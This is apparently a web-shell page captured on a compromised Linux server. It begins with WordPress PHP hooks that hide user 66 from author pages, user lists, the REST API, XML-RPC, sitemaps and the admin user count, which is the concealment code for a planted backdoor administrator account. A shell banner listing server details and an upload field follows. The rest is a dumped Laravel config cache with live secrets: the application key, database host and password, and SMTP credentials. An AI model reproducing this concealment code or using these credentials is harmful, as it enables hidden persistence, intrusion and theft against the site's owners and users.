add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/futuresfunder/bootstrap/cache/ |
Upload File : |
<?php return array (
'broadcasting' =>
array (
'default' => 'log',
'connections' =>
array (
'reverb' =>
array (
'driver' => 'reverb',
'key' => NULL,
'secret' => NULL,
'app_id' => NULL,
'options' =>
array (
'host' => NULL,
'port' => 443,
'scheme' => 'https',
'useTLS' => true,
),
'client_options' =>
array (
),
),
'pusher' =>
array (
'driver' => 'pusher',
'key' => NULL,
'secret' => NULL,
'app_id' => NULL,
'options' =>
array (
'cluster' => NULL,
'host' => 'api-mt1.pusher.com',
'port' => 443,
'scheme' => 'https',
'encrypted' => true,
'useTLS' => true,
),
'client_options' =>
array (
),
),
'ably' =>
array (
'driver' => 'ably',
'key' => NULL,
),
'log' =>
array (
'driver' => 'log',
),
'null' =>
array (
'driver' => 'null',
),
),
),
'hashing' =>
array (
'driver' => 'bcrypt',
'bcrypt' =>
array (
'rounds' => '12',
'verify' => true,
'limit' => NULL,
),
'argon' =>
array (
'memory' => 65536,
'threads' => 1,
'time' => 4,
'verify' => true,
),
'rehash_on_login' => true,
),
'cors' =>
array (
'paths' =>
array (
0 => 'api/*',
1 => 'sanctum/csrf-cookie',
),
'allowed_methods' =>
array (
0 => '*',
),
'allowed_origins' =>
array (
0 => '*',
),
'allowed_origins_patterns' =>
array (
),
'allowed_headers' =>
array (
0 => '*',
),
'exposed_headers' =>
array (
),
'max_age' => 0,
'supports_credentials' => false,
),
'concurrency' =>
array (
'default' => 'process',
),
'view' =>
array (
'paths' =>
array (
0 => '/var/www/html/futuresfunder/resources/views',
),
'compiled' => '/var/www/html/futuresfunder/storage/framework/views',
),
'app' =>
array (
'name' => 'European SF Funding',
'env' => 'production',
'debug' => false,
'url' => 'https://funding.europiasf.eu',
'frontend_url' => 'http://localhost:3000',
'asset_url' => NULL,
'timezone' => 'UTC',
'locale' => 'en',
'fallback_locale' => 'en',
'faker_locale' => 'en_UK',
'cipher' => 'AES-256-CBC',
'key' => 'base64:qoZhgBFrTLHNBkYEY2wdIRL0wY43p5y13mQhwd/F2lg=',
'previous_keys' =>
array (
),
'maintenance' =>
array (
'driver' => 'file',
'store' => 'database',
),
'providers' =>
array (
0 => 'Illuminate\\Auth\\AuthServiceProvider',
1 => 'Illuminate\\Broadcasting\\BroadcastServiceProvider',
2 => 'Illuminate\\Bus\\BusServiceProvider',
3 => 'Illuminate\\Cache\\CacheServiceProvider',
4 => 'Illuminate\\Foundation\\Providers\\ConsoleSupportServiceProvider',
5 => 'Illuminate\\Concurrency\\ConcurrencyServiceProvider',
6 => 'Illuminate\\Cookie\\CookieServiceProvider',
7 => 'Illuminate\\Database\\DatabaseServiceProvider',
8 => 'Illuminate\\Encryption\\EncryptionServiceProvider',
9 => 'Illuminate\\Filesystem\\FilesystemServiceProvider',
10 => 'Illuminate\\Foundation\\Providers\\FoundationServiceProvider',
11 => 'Illuminate\\Hashing\\HashServiceProvider',
12 => 'Illuminate\\Mail\\MailServiceProvider',
13 => 'Illuminate\\Notifications\\NotificationServiceProvider',
14 => 'Illuminate\\Pagination\\PaginationServiceProvider',
15 => 'Illuminate\\Auth\\Passwords\\PasswordResetServiceProvider',
16 => 'Illuminate\\Pipeline\\PipelineServiceProvider',
17 => 'Illuminate\\Queue\\QueueServiceProvider',
18 => 'Illuminate\\Redis\\RedisServiceProvider',
19 => 'Illuminate\\Session\\SessionServiceProvider',
20 => 'Illuminate\\Translation\\TranslationServiceProvider',
21 => 'Illuminate\\Validation\\ValidationServiceProvider',
22 => 'Illuminate\\View\\ViewServiceProvider',
23 => 'App\\Providers\\AppServiceProvider',
),
'aliases' =>
array (
'App' => 'Illuminate\\Support\\Facades\\App',
'Arr' => 'Illuminate\\Support\\Arr',
'Artisan' => 'Illuminate\\Support\\Facades\\Artisan',
'Auth' => 'Illuminate\\Support\\Facades\\Auth',
'Benchmark' => 'Illuminate\\Support\\Benchmark',
'Blade' => 'Illuminate\\Support\\Facades\\Blade',
'Broadcast' => 'Illuminate\\Support\\Facades\\Broadcast',
'Bus' => 'Illuminate\\Support\\Facades\\Bus',
'Cache' => 'Illuminate\\Support\\Facades\\Cache',
'Concurrency' => 'Illuminate\\Support\\Facades\\Concurrency',
'Config' => 'Illuminate\\Support\\Facades\\Config',
'Context' => 'Illuminate\\Support\\Facades\\Context',
'Cookie' => 'Illuminate\\Support\\Facades\\Cookie',
'Crypt' => 'Illuminate\\Support\\Facades\\Crypt',
'Date' => 'Illuminate\\Support\\Facades\\Date',
'DB' => 'Illuminate\\Support\\Facades\\DB',
'Eloquent' => 'Illuminate\\Database\\Eloquent\\Model',
'Event' => 'Illuminate\\Support\\Facades\\Event',
'File' => 'Illuminate\\Support\\Facades\\File',
'Gate' => 'Illuminate\\Support\\Facades\\Gate',
'Hash' => 'Illuminate\\Support\\Facades\\Hash',
'Http' => 'Illuminate\\Support\\Facades\\Http',
'Js' => 'Illuminate\\Support\\Js',
'Lang' => 'Illuminate\\Support\\Facades\\Lang',
'Log' => 'Illuminate\\Support\\Facades\\Log',
'Mail' => 'Illuminate\\Support\\Facades\\Mail',
'Notification' => 'Illuminate\\Support\\Facades\\Notification',
'Number' => 'Illuminate\\Support\\Number',
'Password' => 'Illuminate\\Support\\Facades\\Password',
'Process' => 'Illuminate\\Support\\Facades\\Process',
'Queue' => 'Illuminate\\Support\\Facades\\Queue',
'RateLimiter' => 'Illuminate\\Support\\Facades\\RateLimiter',
'Redirect' => 'Illuminate\\Support\\Facades\\Redirect',
'Request' => 'Illuminate\\Support\\Facades\\Request',
'Response' => 'Illuminate\\Support\\Facades\\Response',
'Route' => 'Illuminate\\Support\\Facades\\Route',
'Schedule' => 'Illuminate\\Support\\Facades\\Schedule',
'Schema' => 'Illuminate\\Support\\Facades\\Schema',
'Session' => 'Illuminate\\Support\\Facades\\Session',
'Storage' => 'Illuminate\\Support\\Facades\\Storage',
'Str' => 'Illuminate\\Support\\Str',
'Uri' => 'Illuminate\\Support\\Uri',
'URL' => 'Illuminate\\Support\\Facades\\URL',
'Validator' => 'Illuminate\\Support\\Facades\\Validator',
'View' => 'Illuminate\\Support\\Facades\\View',
'Vite' => 'Illuminate\\Support\\Facades\\Vite',
),
),
'auth' =>
array (
'defaults' =>
array (
'guard' => 'web',
'passwords' => 'users',
),
'guards' =>
array (
'web' =>
array (
'driver' => 'session',
'provider' => 'users',
),
),
'providers' =>
array (
'users' =>
array (
'driver' => 'eloquent',
'model' => 'App\\Models\\User',
),
),
'passwords' =>
array (
'users' =>
array (
'provider' => 'users',
'table' => 'password_reset_tokens',
'expire' => 60,
'throttle' => 60,
),
),
'password_timeout' => 10800,
),
'cache' =>
array (
'default' => 'database',
'stores' =>
array (
'array' =>
array (
'driver' => 'array',
'serialize' => false,
),
'session' =>
array (
'driver' => 'session',
'key' => '_cache',
),
'database' =>
array (
'driver' => 'database',
'connection' => NULL,
'table' => 'cache',
'lock_connection' => NULL,
'lock_table' => NULL,
),
'file' =>
array (
'driver' => 'file',
'path' => '/var/www/html/futuresfunder/storage/framework/cache/data',
'lock_path' => '/var/www/html/futuresfunder/storage/framework/cache/data',
),
'storage' =>
array (
'driver' => 'storage',
'disk' => NULL,
'path' => 'framework/cache/data',
),
'memcached' =>
array (
'driver' => 'memcached',
'persistent_id' => NULL,
'sasl' =>
array (
0 => NULL,
1 => NULL,
),
'options' =>
array (
),
'servers' =>
array (
0 =>
array (
'host' => '127.0.0.1',
'port' => 11211,
'weight' => 100,
),
),
),
'redis' =>
array (
'driver' => 'redis',
'connection' => 'cache',
'lock_connection' => 'default',
),
'dynamodb' =>
array (
'driver' => 'dynamodb',
'key' => NULL,
'secret' => NULL,
'region' => 'us-east-1',
'table' => 'cache',
'endpoint' => NULL,
),
'octane' =>
array (
'driver' => 'octane',
),
'failover' =>
array (
'driver' => 'failover',
'stores' =>
array (
0 => 'database',
1 => 'array',
),
),
),
'prefix' => 'european-sf-funding-cache-',
'serializable_classes' => false,
),
'countries' =>
array (
'AL' => 'Albania',
'AD' => 'Andorra',
'AM' => 'Armenia',
'AT' => 'Austria',
'AZ' => 'Azerbaijan',
'BE' => 'Belgium',
'BA' => 'Bosnia and Herzegovina',
'BG' => 'Bulgaria',
'CH' => 'Switzerland',
'CY' => 'Cyprus',
'CZ' => 'Czechia',
'DE' => 'Germany',
'DK' => 'Denmark',
'EE' => 'Estonia',
'ES' => 'Spain',
'FI' => 'Finland',
'FR' => 'France',
'GB' => 'United Kingdom',
'GE' => 'Georgia',
'GR' => 'Greece',
'HR' => 'Croatia',
'HU' => 'Hungary',
'IE' => 'Ireland',
'IS' => 'Iceland',
'IT' => 'Italy',
'LI' => 'Liechtenstein',
'LT' => 'Lithuania',
'LU' => 'Luxembourg',
'LV' => 'Latvia',
'MC' => 'Monaco',
'MD' => 'Moldova',
'ME' => 'Montenegro',
'MK' => 'North Macedonia',
'MT' => 'Malta',
'NL' => 'Netherlands',
'NO' => 'Norway',
'PL' => 'Poland',
'PT' => 'Portugal',
'RO' => 'Romania',
'RS' => 'Serbia',
'SE' => 'Sweden',
'SI' => 'Slovenia',
'SK' => 'Slovakia',
'SM' => 'San Marino',
'TR' => 'Türkiye',
'UA' => 'Ukraine',
),
'database' =>
array (
'default' => 'mysql',
'connections' =>
array (
'sqlite' =>
array (
'driver' => 'sqlite',
'url' => NULL,
'database' => 'funder_db0',
'prefix' => '',
'foreign_key_constraints' => true,
'busy_timeout' => NULL,
'journal_mode' => NULL,
'synchronous' => NULL,
'transaction_mode' => 'DEFERRED',
),
'mysql' =>
array (
'driver' => 'mysql',
'url' => NULL,
'host' => 'lrkk.your-database.de',
'port' => '3306',
'database' => 'funder_db0',
'username' => 'frelevy_0',
'password' => 'x4#T*hvd}Fh2',
'unix_socket' => '',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'prefix_indexes' => true,
'strict' => true,
'engine' => NULL,
'options' =>
array (
),
),
'mariadb' =>
array (
'driver' => 'mariadb',
'url' => NULL,
'host' => 'lrkk.your-database.de',
'port' => '3306',
'database' => 'funder_db0',
'username' => 'frelevy_0',
'password' => 'x4#T*hvd}Fh2',
'unix_socket' => '',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'prefix_indexes' => true,
'strict' => true,
'engine' => NULL,
'options' =>
array (
),
),
'pgsql' =>
array (
'driver' => 'pgsql',
'url' => NULL,
'host' => 'lrkk.your-database.de',
'port' => '3306',
'database' => 'funder_db0',
'username' => 'frelevy_0',
'password' => 'x4#T*hvd}Fh2',
'charset' => 'utf8',
'prefix' => '',
'prefix_indexes' => true,
'search_path' => 'public',
'sslmode' => 'prefer',
),
'sqlsrv' =>
array (
'driver' => 'sqlsrv',
'url' => NULL,
'host' => 'lrkk.your-database.de',
'port' => '3306',
'database' => 'funder_db0',
'username' => 'frelevy_0',
'password' => 'x4#T*hvd}Fh2',
'charset' => 'utf8',
'prefix' => '',
'prefix_indexes' => true,
),
),
'migrations' =>
array (
'table' => 'migrations',
'update_date_on_publish' => true,
),
'redis' =>
array (
'client' => 'phpredis',
'options' =>
array (
'cluster' => 'redis',
'prefix' => 'european-sf-funding-database-',
'persistent' => false,
),
'default' =>
array (
'url' => NULL,
'host' => '127.0.0.1',
'username' => NULL,
'password' => NULL,
'port' => '6379',
'database' => '0',
'max_retries' => 3,
'backoff_algorithm' => 'decorrelated_jitter',
'backoff_base' => 100,
'backoff_cap' => 1000,
),
'cache' =>
array (
'url' => NULL,
'host' => '127.0.0.1',
'username' => NULL,
'password' => NULL,
'port' => '6379',
'database' => '1',
'max_retries' => 3,
'backoff_algorithm' => 'decorrelated_jitter',
'backoff_base' => 100,
'backoff_cap' => 1000,
),
),
),
'filesystems' =>
array (
'default' => 'local',
'disks' =>
array (
'local' =>
array (
'driver' => 'local',
'root' => '/var/www/html/futuresfunder/storage/app/private',
'serve' => true,
'throw' => false,
'report' => false,
),
'public' =>
array (
'driver' => 'local',
'root' => '/var/www/html/futuresfunder/storage/app/public',
'url' => 'https://funding.europiasf.eu/storage',
'visibility' => 'public',
'throw' => false,
'report' => false,
),
's3' =>
array (
'driver' => 's3',
'key' => NULL,
'secret' => NULL,
'region' => NULL,
'bucket' => NULL,
'url' => NULL,
'endpoint' => NULL,
'use_path_style_endpoint' => false,
'throw' => false,
'report' => false,
),
),
'links' =>
array (
'/var/www/html/futuresfunder/public/storage' => '/var/www/html/futuresfunder/storage/app/public',
),
),
'languages' =>
array (
'sq' => 'Albanian (Shqip)',
'be' => 'Belarusian (Беларуская)',
'bs' => 'Bosnian (Bosanski)',
'bg' => 'Bulgarian (Български)',
'ca' => 'Catalan (Català)',
'hr' => 'Croatian (Hrvatski)',
'cs' => 'Czech (Čeština)',
'da' => 'Danish (Dansk)',
'nl' => 'Dutch (Nederlands)',
'en' => 'English',
'et' => 'Estonian (Eesti)',
'fi' => 'Finnish (Suomi)',
'fr' => 'French (Français)',
'gl' => 'Galician (Galego)',
'de' => 'German (Deutsch)',
'el' => 'Greek (Ελληνικά)',
'hu' => 'Hungarian (Magyar)',
'is' => 'Icelandic (Íslenska)',
'ga' => 'Irish (Gaeilge)',
'it' => 'Italian (Italiano)',
'lv' => 'Latvian (Latviešu)',
'lt' => 'Lithuanian (Lietuvių)',
'lb' => 'Luxembourgish (Lëtzebuergesch)',
'mk' => 'Macedonian (Македонски)',
'mt' => 'Maltese (Malti)',
'no' => 'Norwegian (Norsk)',
'pl' => 'Polish (Polski)',
'pt' => 'Portuguese (Português)',
'ro' => 'Romanian (Română)',
'ru' => 'Russian (Русский)',
'sr' => 'Serbian (Српски)',
'sk' => 'Slovak (Slovenčina)',
'sl' => 'Slovenian (Slovenščina)',
'es' => 'Spanish (Español)',
'sv' => 'Swedish (Svenska)',
'tr' => 'Turkish (Türkçe)',
'uk' => 'Ukrainian (Українська)',
'cy' => 'Welsh (Cymraeg)',
'ar' => 'Arabic (العربية)',
'zh' => 'Chinese (中文)',
'he' => 'Hebrew (עברית)',
'hi' => 'Hindi (हिन्दी)',
'ja' => 'Japanese (日本語)',
'ko' => 'Korean (한국어)',
'fa' => 'Persian (فارسی)',
'th' => 'Thai (ภาษาไทย)',
'vi' => 'Vietnamese (Tiếng Việt)',
),
'logging' =>
array (
'default' => 'stack',
'deprecations' =>
array (
'channel' => NULL,
'trace' => false,
),
'channels' =>
array (
'stack' =>
array (
'driver' => 'stack',
'channels' =>
array (
0 => 'single',
),
'ignore_exceptions' => false,
),
'single' =>
array (
'driver' => 'single',
'path' => '/var/www/html/futuresfunder/storage/logs/laravel.log',
'level' => 'debug',
'replace_placeholders' => true,
),
'daily' =>
array (
'driver' => 'daily',
'path' => '/var/www/html/futuresfunder/storage/logs/laravel.log',
'level' => 'debug',
'days' => 14,
'replace_placeholders' => true,
),
'slack' =>
array (
'driver' => 'slack',
'url' => NULL,
'username' => 'European SF Funding',
'emoji' => ':boom:',
'level' => 'debug',
'replace_placeholders' => true,
),
'papertrail' =>
array (
'driver' => 'monolog',
'level' => 'debug',
'handler' => 'Monolog\\Handler\\SyslogUdpHandler',
'handler_with' =>
array (
'host' => NULL,
'port' => NULL,
'connectionString' => 'tls://:',
),
'processors' =>
array (
0 => 'Monolog\\Processor\\PsrLogMessageProcessor',
),
),
'stderr' =>
array (
'driver' => 'monolog',
'level' => 'debug',
'handler' => 'Monolog\\Handler\\StreamHandler',
'handler_with' =>
array (
'stream' => 'php://stderr',
),
'formatter' => NULL,
'processors' =>
array (
0 => 'Monolog\\Processor\\PsrLogMessageProcessor',
),
),
'syslog' =>
array (
'driver' => 'syslog',
'level' => 'debug',
'facility' => 8,
'replace_placeholders' => true,
),
'errorlog' =>
array (
'driver' => 'errorlog',
'level' => 'debug',
'replace_placeholders' => true,
),
'null' =>
array (
'driver' => 'monolog',
'handler' => 'Monolog\\Handler\\NullHandler',
),
'emergency' =>
array (
'path' => '/var/www/html/futuresfunder/storage/logs/laravel.log',
),
),
),
'mail' =>
array (
'default' => 'smtp',
'mailers' =>
array (
'smtp' =>
array (
'transport' => 'smtp',
'scheme' => NULL,
'url' => NULL,
'host' => 'mail.your-server.de',
'port' => '587',
'username' => 'lokapala@europiasf.eu',
'password' => 'm7*G6:c/c9KX',
'timeout' => NULL,
'local_domain' => 'funding.europiasf.eu',
),
'ses' =>
array (
'transport' => 'ses',
),
'postmark' =>
array (
'transport' => 'postmark',
),
'resend' =>
array (
'transport' => 'resend',
),
'sendmail' =>
array (
'transport' => 'sendmail',
'path' => '/usr/sbin/sendmail -bs -i',
),
'log' =>
array (
'transport' => 'log',
'channel' => NULL,
),
'array' =>
array (
'transport' => 'array',
),
'failover' =>
array (
'transport' => 'failover',
'mailers' =>
array (
0 => 'smtp',
1 => 'log',
),
'retry_after' => 60,
),
'roundrobin' =>
array (
'transport' => 'roundrobin',
'mailers' =>
array (
0 => 'ses',
1 => 'postmark',
),
'retry_after' => 60,
),
),
'from' =>
array (
'address' => 'lokapala@europiasf.eu',
'name' => 'European SF Funding',
),
'markdown' =>
array (
'theme' => 'default',
'paths' =>
array (
0 => '/var/www/html/futuresfunder/resources/views/vendor/mail',
),
'extensions' =>
array (
),
),
),
'queue' =>
array (
'default' => 'database',
'connections' =>
array (
'sync' =>
array (
'driver' => 'sync',
),
'database' =>
array (
'driver' => 'database',
'connection' => NULL,
'table' => 'jobs',
'queue' => 'default',
'retry_after' => 90,
'after_commit' => false,
),
'beanstalkd' =>
array (
'driver' => 'beanstalkd',
'host' => 'localhost',
'queue' => 'default',
'retry_after' => 90,
'block_for' => 0,
'after_commit' => false,
),
'sqs' =>
array (
'driver' => 'sqs',
'key' => NULL,
'secret' => NULL,
'prefix' => 'https://sqs.us-east-1.amazonaws.com/your-account-id',
'queue' => 'default',
'suffix' => NULL,
'region' => 'us-east-1',
'after_commit' => false,
),
'redis' =>
array (
'driver' => 'redis',
'connection' => 'default',
'queue' => 'default',
'retry_after' => 90,
'block_for' => NULL,
'after_commit' => false,
),
'deferred' =>
array (
'driver' => 'deferred',
),
'failover' =>
array (
'driver' => 'failover',
'connections' =>
array (
0 => 'database',
1 => 'deferred',
),
),
'background' =>
array (
'driver' => 'background',
),
),
'batching' =>
array (
'database' => 'mysql',
'table' => 'job_batches',
),
'failed' =>
array (
'driver' => 'database-uuids',
'database' => 'mysql',
'table' => 'failed_jobs',
),
),
'services' =>
array (
'postmark' =>
array (
'key' => NULL,
),
'resend' =>
array (
'key' => NULL,
),
'ses' =>
array (
'key' => NULL,
'secret' => NULL,
'region' => 'us-east-1',
),
'slack' =>
array (
'notifications' =>
array (
'bot_user_oauth_token' => NULL,
'channel' => NULL,
),
),
),
'session' =>
array (
'driver' => 'database',
'lifetime' => 120,
'expire_on_close' => false,
'encrypt' => false,
'files' => '/var/www/html/futuresfunder/storage/framework/sessions',
'connection' => NULL,
'table' => 'sessions',
'store' => NULL,
'lottery' =>
array (
0 => 2,
1 => 100,
),
'cookie' => 'european-sf-funding-session',
'path' => '/',
'domain' => NULL,
'secure' => NULL,
'http_only' => true,
'same_site' => 'lax',
'partitioned' => false,
'serialization' => 'json',
),
'livewire' =>
array (
'class_namespace' => 'App\\Livewire',
'view_path' => '/var/www/html/futuresfunder/resources/views/livewire',
'layout' => 'components.layouts.app',
'lazy_placeholder' => NULL,
'temporary_file_upload' =>
array (
'disk' => NULL,
'rules' => NULL,
'directory' => NULL,
'middleware' => NULL,
'preview_mimes' =>
array (
0 => 'png',
1 => 'gif',
2 => 'bmp',
3 => 'svg',
4 => 'wav',
5 => 'mp4',
6 => 'mov',
7 => 'avi',
8 => 'wmv',
9 => 'mp3',
10 => 'm4a',
11 => 'jpg',
12 => 'jpeg',
13 => 'mpga',
14 => 'webp',
15 => 'wma',
),
'max_upload_time' => 5,
'cleanup' => true,
),
'render_on_redirect' => false,
'legacy_model_binding' => false,
'inject_assets' => true,
'navigate' =>
array (
'show_progress_bar' => true,
'progress_bar_color' => '#2299dd',
),
'inject_morph_markers' => true,
'smart_wire_keys' => false,
'pagination_theme' => 'tailwind',
'release_token' => 'a',
),
'tinker' =>
array (
'commands' =>
array (
),
'alias' =>
array (
),
'dont_alias' =>
array (
0 => 'App\\Nova',
),
'trust_project' => 'always',
),
);